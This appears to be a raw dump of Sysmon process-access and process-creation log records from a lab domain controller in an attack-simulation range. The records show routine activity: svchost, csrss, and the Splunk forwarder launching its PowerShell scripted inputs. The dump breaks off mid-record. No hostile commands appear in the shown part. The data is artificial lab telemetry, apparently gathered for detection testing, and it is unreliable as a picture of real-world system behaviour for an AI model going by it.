Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-432A-6000-E500-000000009A01}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432A-6000-E500-000000009A01}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.382{08A6967A-432A-6000-E500-000000009A01}5076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.275{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432A-6000-E400-000000009A01}1180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.274{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.274{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-432A-6000-E400-000000009A01}1180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.270{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432A-6000-E400-000000009A01}1180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.272{08A6967A-432A-6000-E400-000000009A01}1180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432A-6000-E300-000000009A01}5080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 